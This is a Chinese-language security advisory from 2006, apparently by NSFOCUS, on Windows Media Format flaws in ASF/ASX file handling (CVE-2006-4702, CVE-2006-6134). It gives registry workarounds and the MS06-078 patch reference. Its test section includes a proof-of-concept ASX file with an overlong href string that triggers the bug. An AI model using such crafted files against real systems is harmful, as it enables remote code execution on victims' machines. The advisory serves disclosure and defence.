发布日期：2006-12-13
更新日期：2006-12-13

受影响系统：

Microsoft Windows Media Player 6.4
Microsoft Windows Media Format 9.5 Series Runtime x64 Edition
Microsoft Windows Media Format 7.1 - 9.5 Series Runtime

描述：

---

BUGTRAQ  ID: 21505,21247
CVE(CAN) ID: CVE-2006-4702,CVE-2006-6134

Microsoft Windows是微软发布的非常流行的操作系统。

Windows的Media Format的运行时库在处理包含畸形内容的ASF及ASX文件时存在漏洞，远程攻击者可能利用此漏洞完全控制用户机器。

如果用户浏览了恶意设置的网站或被诱骗打开了包含恶意内容的电子邮件，远程攻击者可能在用户机器上执行任意指令。


<*来源：sehato （sehato@yandex.ru）
  
  链接：http://research.eeye.com/html/alerts/zeroday/20061122.html
        http://blogs.technet.com/msrc/archive/2006/12/07/public-proof-of-concept-code-for-asx-file-format-is
        http://www.microsoft.com/technet/security/Bulletin/MS06-078.mspx
        http://www.us-cert.gov/cas/techalerts/TA06-346A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

file "example.asx":

<asx><entry>
<ref
href="aa:/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa.mp3"/>
</entry></asx>

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在IE中设置禁用Media Player ActiveX控件

对于ASF文件处理漏洞（CVE-2006-4702）

Windows Media Player 6.4

将如下的文本保存为.reg文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22D6F312-B0F6-11D0-94AB-0080C74C7E95}]

"Compatibility Flags"=dword:00000400

双击此.reg文件应用到系统。

Windows Media Player 7.1, 9 和 10

将如下的文本保存为.reg文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BF52A52-394A-11D3-B153-00C04F79FAA6}]

"Compatibility Flags"=dword:00000400

双击此.reg文件应用到系统。

对于ASX文件处理漏洞（CVE-2006-6134）

Windows Media Player9和10

将如下的文本保存为.reg文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BF52A52-394A-11D3-B153-00C04F79FAA6}]

"Compatibility Flags"=dword:00000400

双击此.reg文件应用到系统。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-078）以及相应补丁:
MS06-078：Vulnerability in Windows Media Format Could Allow Remote Code Execution (923689)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-078.mspx

浏览次数：4523
严重程度：0（网友投票）